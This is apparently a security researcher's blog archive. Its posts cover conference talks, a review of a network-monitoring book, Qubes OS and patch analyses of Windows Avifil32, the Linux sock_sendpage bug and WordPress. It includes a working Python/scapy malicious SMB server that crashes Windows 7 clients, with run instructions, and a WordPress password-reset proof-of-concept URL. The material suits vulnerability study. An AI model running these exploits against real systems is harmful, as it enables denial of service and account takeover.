In terms of presentations, my favorites were: Chris spencer “Professional Vulnerability Research and Analysis” and Daniel Grzelak + Paul Therault “The Rules of the Internet, and the Browsers That Break Them“.

My presentation on the History of Microsoft Exploit Mitigations can be downloaded at the following link: Auscert-2k10: A history of Microsoft exploit mitigations

Also thanks to Risky Business for their podcast: http://media.risky.biz/auscert2010/RB2-AC-mosse.mp3

On April 14th, Laurent Gaffie published an article explaining how to trigger the vulnerability he discovered
in the SMB client of Windows 7 (MS20-010). I have used his article to reconstruct a malicious SMB server
that triggers the bug which causes Windows 7 to throw a blue screen of death.

The following is a python code that emulates being a SMBv1 server using this
pcap file:

import SocketServer
from scapy.all import *

class SMB2_server(SocketServer.BaseRequestHandler):

	def __init__(self, request, client_address, server):
		self.request = request
		self.client_address = client_address
		self.pcapfile = rdpcap('./XP-dump-6.pcap', count=30)
		self.pkts = []
		self.to_fuzz = -1

		i=0
		for pkt in self.pcapfile:
			pkt = pkt.getlayer(IP)
			if pkt != None and pkt.src == "192.168.136.133" and "SMB" in str(pkt):
				pkt = pkt.getlayer(Raw)

				if "SMB\x32" in str(pkt) and str(pkt).endswith("\x01\x00\x00\x00"):
					self.to_fuzz = i
					print "[-] please fuzz pkt %s" % i

				self.pkts.insert(i, pkt)
				i+=1

		try:
			self.handle()
		except KeyboardInterrupt:
			self.logfile.close()
			self.request.close()

	def Byte2Hex(self, string):
		return ''.join( [ "\\x%02X" % ord( x ) for x in string ] ).strip()

	def handle(self):
		print "[+] client connected!"
		con = self.request

		i=0
		while(i < len(self.pkts)-1):
			data = con.recv(1024)
			pkt = str(self.pkts[i])
			if data:
				if i == self.to_fuzz:
					pkt = pkt.replace("\x3c\x00", "\xFF\xFF")
					pkt+="\x41" * 10
					con.send(pkt)
					print "[+] SENT POC"
				else:
					con.send(pkt)
					print "[+] sent packet %i" % i
				i+=1

try:
	SocketServer.TCPServer.allow_reuse_address = True

	s = SocketServer.ThreadingTCPServer(('192.168.136.1', 445), SMB2_server)
	s.serve_forever()
except (KeyboardInterrupt, SystemExit):
	s.server_close()
	sys.exit(1)

I assume you would be running the above code on a operating system other than Windows. Make sure to run it as root.

Then boot up your Windows 7 machine (mine is a VM), open a command line console and type the following command:

start \\[replace this part with the ip of your malicious smb server]\hehe

My malicious server was running on 192.168.136.1 so I ran: start \\192.168.136.1\hehe

You should get a blue screen of death. Note that after your system has crashed, you may have some issues rebooting it.
In which case, I force the VM to shutdown, boot it again and tell it to start normally instead of trying to repair itself.

I will summarise in a few lignes why I would recommend that book to anyone working in the IT security industry:

- The book is extremely well written. You will flow from one chapter to another; from page XVII (Foreword) to 763 (Appendix C).
- The book introduces all required notions to understand each and every chapter (given you know a bit about how networks, vulnerabilities and exploits work).
- The Tao of NSM not only focuses on the technical aspect (i.e. tools, methods, scripts) of network security monitoring but also gives the reader more knowledge about NSM. Such as the history behind NSM, how to implement and deploy NSM in your organisation or how to manage your team of network security analyst.
- R. Bejtlich explains in detail how to install, configure and use each and every tools he mentions in his book (and all the tools are open source!).

As I am not a network analyst, I originally bought the book with the intention of only reading the concepts and ideas behind NSM; thinking I could always come back and look at the tools when life would require it. But I was completely drown into the book and ended up reading all of it.

Having read that small review, I hope this book will find you well and that you will appreciate it as much as I did.

What makes those stories interesting and great for what they are is that they are unique. Otherwise we wouldn’t be talking about them. But entertainment is a poor source of evidence. Because the US or Google have been attacked does not prove that those stories have a particular significance to any one organisation. In other words do not get tempted to think that the stories the press published are a realistic representation of the state of your security or the security in the world.

We do not have sound evidence to say that because people have recently showed that the US or Google have been attacked, the world today is less secure than yesterday. Neither that because Google was attacked with one specific technique, you will also be the victim of that method. Additionally, no particular conclusion can be drawn from an increase or decrease in the number of attacks on the internet.

Project Qubes aims at building a secure operating system for desktop and laptop computers. The stress is on security, which is achieved by exploiting the isolation capabilities of the bare-metal hypervisor (Xen), together with modern hardware technologies, such as Intel VT-d and Trusted Execution Technology.

Current mainstream operating systems that are used for desktop computing, e.g. Windows, Mac OS X, orLinux-based systems, proved unsatisfactory when it comes to security. The major problem with current sys-tems is their inability to provide effective isolation between various programs running on one machine. E.g. ifthe userʼs Web browser gets compromised (due to a bug exploited by a malicious web site), the OS is usu-ally unable to protect other userʼs applications and data from also being compromised. Similarly, if certainsystem core components get compromised, e.g. WiFi driver or stack, none of the mentioned above systemscan defend themselves from a complete compromise of all the userʼs applications and data.The above situation is a direct result of certain architectural design decisions, which include over-complexityof the OS API, insecure GUI design, and, last but not least, the monolithic kernel architecture. It is the opin-ion of the authors that systems that are based on such insecure architecture simply cannot be made secure.One can, of course, try to take the reactive approach, as many vendors do today, and try to patch every sin-gle known security bug. But such approach not only doesnʼt scale well, it simply doesnʼt work. Especially forusers who require more than average security. Patching can only address known and popular attacks, butoffers no protection against new, or less popular, more targeted, threats.

Authors of this document do not believe that, at any time in the foreseeable future, we would be able to patch all the bugs in the software we use, as well as detect all the malicious software. Consequently we need a different approach to build secure systems. Obviously building a new OS can be a very time consuming task. Thatʼs why, with Qubes OS, we reuse as much ready-to-use building blocks as possible, in particular the Xen hypervisor. This in turn implies the use of virtualization technology, which is used for two primary reasons: offering excellent security isolation properties, as well as the ability to reuse the large amount of software, including most of the applications and drivers written for mainstream OSes, like Linux or Windows.

Additionally I have no idea if people from Core Impact follow this blog, but if they do this is the URL to my latest SVN project called ErebosHacking which contains the latest version of both Browser Rider and Durzosploit: svn://engineeringforfun.com/svn/erebos-hacking/

On the 11th of August, Microsoft published a security patch fixing an integer overflow vulnerability discovered by Vinay Anantharaman in Windows Media in AVI files. That vulnerability is present within Avifil32.dll.

The vulnerable decompiled function:

signed int __stdcall sub_73AAA586(int a1, int a2, int a3)
{
  DWORD v3; // ecx@1
  int v4; // edi@1
  signed int result; // eax@2
  int v6; // esi@3
  HGLOBAL hMem; // eax@5
  LPVOID LP_ret_GlobalLock_2; // ebx@7
  unsigned int v9; // eax@1
  HGLOBAL v10; // eax@5
  DWORD v11; // ST04_4@5
  HGLOBAL v12; // eax@5
  LPVOID LP_ret_GlobalLock_1; // eax@7
  int v14; // eax@9

  v4 = a3;
  v9 = *(_DWORD *)(a3 + 4);
  v3 = v9 + 8;
  a3 = v9 + 8;
  if ( v9 + 8 < v9 )
    return -2147205017;
  v6 = a1;
  if ( *(_DWORD *)a1 )
  {
    if ( v3 + *(_DWORD *)(a1 + 4) < v3 )
      return -2147205017;
    v10 = GlobalHandle(*(LPCVOID *)a1);
    GlobalUnlock(v10);
    v11 = a3 + *(_DWORD *)(v6 + 4);
    v12 = GlobalHandle(*(LPCVOID *)v6);
    hMem = GlobalReAlloc(v12, v11, 0x2002u);
  }
  else
  {
    hMem = GlobalAlloc(0x2002u, v3);
  }
  LP_ret_GlobalLock_1 = GlobalLock(hMem);
  LP_ret_GlobalLock_2 = LP_ret_GlobalLock_1;
  if ( !LP_ret_GlobalLock_1 )
    return -2147205017;
  v14 = *(_DWORD *)(v6 + 4);
  *(_DWORD *)v6 = LP_ret_GlobalLock_2;
  *(_DWORD *)((char *)LP_ret_GlobalLock_2 + v14) = *(_DWORD *)v4;
  *(_DWORD *)(LP_ret_GlobalLock_2 + *(_DWORD *)(v6 + 4) + 4) = *(_DWORD *)(v4 + 4);
  sub_73AAFE2D(a2, *(_DWORD *)(v4 + 12), 0);
  if ( sub_73AAFDAF(a2, (HPSTR)LP_ret_GlobalLock_2 + *(_DWORD *)(v6 + 4) + 8, *(_DWORD *)(v4 + 4)) == *(_DWORD *)(v4 + 4) )
  {
    *(_DWORD *)(v6 + 4) += a3 + (a3 & 1);
    result = 0;
  }
  else
  {
    result = -2147205011;
  }
  return result;
}

The patch modified the function like so:

igned int __stdcall sub_73B5A58C(int a1, int a2, int a3)
{
  DWORD v3; // ecx@1
  int v4; // edi@1
  signed int result; // eax@2
  int v6; // esi@3
  HGLOBAL hMem; // eax@5
  LPVOID LP_ret_GlobalLock_2; // ebx@7
  int v9; // eax@8
  unsigned int v10; // eax@1
  HGLOBAL v11; // eax@5
  DWORD v12; // ST04_4@5
  HGLOBAL v13; // eax@5
  LPVOID LP_ret_GlobalLock_1; // eax@7

  v4 = a3;
  v10 = *(_DWORD *)(a3 + 4);
  v3 = v10 + 8;
  a3 = v10 + 8;
  if ( v10 + 8 < v10 )
    return -2147205017;
  v6 = a1;
  if ( *(_DWORD *)a1 )
  {
    if ( v3 + *(_DWORD *)(a1 + 4) < v3 )
      return -2147205017;
    v11 = GlobalHandle(*(LPCVOID *)a1);
    GlobalUnlock(v11);
    v12 = a3 + *(_DWORD *)(v6 + 4);
    v13 = GlobalHandle(*(LPCVOID *)v6);
    hMem = GlobalReAlloc(v13, v12, 0x2002u);
  }
  else
  {
    hMem = GlobalAlloc(0x2002u, v3);
  }
  LP_ret_GlobalLock_1 = GlobalLock(hMem);
  LP_ret_GlobalLock_2 = LP_ret_GlobalLock_1;
  if ( !LP_ret_GlobalLock_1 || (v9 = *(_DWORD *)(v6 + 4), *(_DWORD *)v6 = LP_ret_GlobalLock_2, v9 < 0) )
    return -2147205017;
  *(_DWORD *)((char *)LP_ret_GlobalLock_2 + v9) = *(_DWORD *)v4;
  *(_DWORD *)(LP_ret_GlobalLock_2 + *(_DWORD *)(v6 + 4) + 4) = *(_DWORD *)(v4 + 4);
  sub_73B5FE37(a2, *(_DWORD *)(v4 + 12), 0);
  if ( sub_73B5FDB9(a2, (HPSTR)LP_ret_GlobalLock_2 + *(_DWORD *)(v6 + 4) + 8, *(_DWORD *)(v4 + 4)) == *(_DWORD *)(v4 + 4) )
  {
    *(_DWORD *)(v6 + 4) += a3 + (a3 & 1);
    result = 0;
  }
  else
  {
    result = -2147205011;
  }
  return result;
}

From my understanding, the patch pretty much just checks that *(_DWORD *)(v6 + 4) is more than zero before processing the rest of the code. If not it returns:

if ( !LP_ret_GlobalLock_1 || (v9 = *(_DWORD *)(v6 + 4), *(_DWORD *)v6 = LP_ret_GlobalLock_2, v9 < 0) )

I haven’t located exactly where the integer overflow can be used to trigger a memory corruption bug yet so feel free to give me a hint!

Ps: Thanks for Ivanlef0u, if he ever comes on that blog post, for his patience on IRC.

        if (more)
                flags |= MSG_MORE;

-       return sock->ops->sendpage(sock, page, offset, size, flags);
+       return kernel_sendpage(sock, page, offset, size, flags);
 }

 static ssize_t sock_splice_read(struct file *file, loff_t *ppos,

The issue is very straight forward: sock->ops->sendpage is not checked to be valid before being returned.

To quote Julien Tinnes:

The issue lies in how Linux deals with unavailable operations for some protocols. sock_sendpage and others don’t check for NULL pointers before dereferencing operations in the ops structure. Instead the kernel relies on correct initialization of those proto_ops structures with stubs (such as sock_no_sendpage) instead of NULL pointers.

The fix calls the following kernel_sendpage() function which does exactly that check:

int kernel_sendpage(struct socket *sock, struct page *page, int offset, size_t size, int flags)
{
        if (sock->ops->sendpage)
                return sock->ops->sendpage(sock, page, offset, size, flags);

        return sock_no_sendpage(sock, page, offset, size, flags);
}

You may want to have a look at the following urls for more stuff:

• Brad Splengler’s exploit
• The Cr0 blog, which give more details about that vulnerability.
• Red Hat’s report
• Mitigations for that bug from Eugene Teo

That bug is definitely a low risk issue, if considered at all a “security bug”. However what is interesting to learn from it is what happens without the PHP code of WordPress.

That’s the buggy function:

function reset_password($key) {
	global $wpdb;

	$key = preg_replace('/[^a-z0-9]/i', '', $key);

	if ( empty( $key ) )
		return new WP_Error('invalid_key', __('Invalid key'));

	$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
	if ( empty( $user ) )
		return new WP_Error('invalid_key', __('Invalid key'));

	// Generate something random for a password...
	$new_pass = wp_generate_password();

	do_action('password_reset', $user, $new_pass);

	wp_set_password($new_pass, $user->ID);
...
}

Laurent tells us:“A web browser is sufficiant to reproduce this Proof of concept: http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]= The password will be reset without any confirmation.”

So basically, by sending an array instead of a string, Laurent was able to bypass the empty() check at line 190. What’s even more interesting from here is the check done by WordPress to verify if the key can be found within the database:

$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
	return new WP_Error('invalid_key', __('Invalid key'));

This have been placed to detect any abuse of the key. But is not functional because by default the get_row() function returns an object which is not considered empty or null by the empty() function at line 194.

The patch applied by WordPress is the following:

- if ( empty( $key )  )
+ if ( empty( $key ) || !is_string( $key ) )

However this only solves partially the problem. The second check can probably still be bypassed…

Conclusion of this post: using empty() for security checks is clearly not enough; you also need to check the type of your variable and eventually it’s value.